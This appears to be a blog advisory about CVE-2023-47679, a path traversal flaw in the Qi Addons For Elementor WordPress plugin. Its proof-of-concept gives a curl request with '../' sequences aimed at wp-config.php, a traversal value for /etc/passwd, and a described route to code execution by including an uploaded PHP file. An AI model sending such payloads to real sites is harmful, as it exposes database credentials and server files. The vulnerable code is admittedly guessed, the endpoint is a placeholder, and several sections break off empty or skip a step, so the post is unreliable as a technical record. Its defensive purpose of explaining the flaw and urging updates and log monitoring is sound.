A serious security vulnerability, CVE-2023-47679, affects the popular WordPress plugin Qi Addons For Elementor by QODE Interactive. If you use Elementor and manage a WordPress site with this plugin (any version up to and including 1.6.3), you need to pay close attention.
At the heart of CVE-2023-47679 is a classic ― but dangerous ― Path Traversal issue. Attackers can abuse this flaw to load local PHP files from anywhere on your server, potentially exposing sensitive data, executing code, and compromising your entire website.
In this post, I’ll break down how this vulnerability works with simple code examples, walk you through a proof-of-concept (PoC) exploit, and provide resources and recommendations. Everything here is exclusive and written for users who want clarity, not confusion.
What is Path Traversal?
Path Traversal, sometimes called "Directory Traversal," happens when user input isn't properly sanitized in file-handling operations. Instead of being restricted to a certain directory (like your plugin’s own folder), a hacker can insert ../ sequences in their requests, stepping up the directory tree to access files outside of the intended location.
The Flaw in Qi Addons For Elementor
In version 1.6.3 and earlier, the plugin does not thoroughly validate or sanitize user-supplied file paths before including files using PHP’s include function.
In plain English:
An attacker can control which file on your server is loaded by the plugin. If they trick the plugin into loading a system file — for example, /etc/passwd, wp-config.php, or even a malicious file they upload — your entire site could be at risk.
Code Snippet: Where Things Go Wrong
Though the exact vulnerable code may be deep in the plugin’s stack, a simplified version might look like this:
// Example vulnerable PHP code
if (isset($_GET['template'])) {
$file = $_GET['template'];
include(QI_PLUGIN_PATH . '/templates/' . $file . '.php');
}
If the plugin doesn’t sanitize $_GET['template'], an attacker can send
/wp-content/plugins/qi-addons-for-elementor/someendpoint?template=../../../../wp-config
This causes the server to include
QI_PLUGIN_PATH/templates/../../../../wp-config.php
In practice, this loads the parent directories leading to Wordpress’s configuration file, or other sensitive script files.
The result:
Proof-of-Concept (PoC) Exploit
> ⚠️ For educational and defensive use only! Do not attack servers without permission.
Suppose your target is running Qi Addons For Elementor 1.6.3 or lower, and you know the vulnerable parameter is template:
Step 1: Send a crafted HTTP GET request
curl "https://victim.com/wp-content/plugins/qi-addons-for-elementor/someendpoint?template=../../../../wp-config";
If the plugin is vulnerable, you may see part of wp-config.php rendered (though this depends on server/PHP settings).
Try targeting other PHP files
?template=../../../../etc/passwd
On systems where the plugin runs with enough permissions, this can disclose server-level secrets.
Step 3: (Advanced) Achieve Remote Code Execution
If you can upload a file to the site that contains malicious PHP code (for example, using a file upload function elsewhere), you can leverage the path traversal to include and execute your uploaded file.
References and Resources
- NVD Record for CVE-2023-47679
- Qi Addons For Elementor (WordPress Plugin Directory)
- WPScan Vulnerability Entry *(when available)*
- OWASP – Path Traversal Cheat Sheet
Update Immediately:
Patch to the latest version of Qi Addons For Elementor (if/when available). The vendor may release a fix to properly validate all file paths.
Monitor Logs:
Watch for suspicious requests with lots of ../ in URLs. These are often signs of probing.
Final Words
CVE-2023-47679 is a vivid reminder that even popular, high-profile plugins can contain "classic" zero-day flaws. Path traversal can feel like "old-news," but when combined with modern CMS stacks and PHP, the consequences are deadly serious.
If you use Qi Addons For Elementor:
Timeline
Published on: 05/17/2024 09:15:11 UTC
Last modified on: 05/17/2024 18:36:05 UTC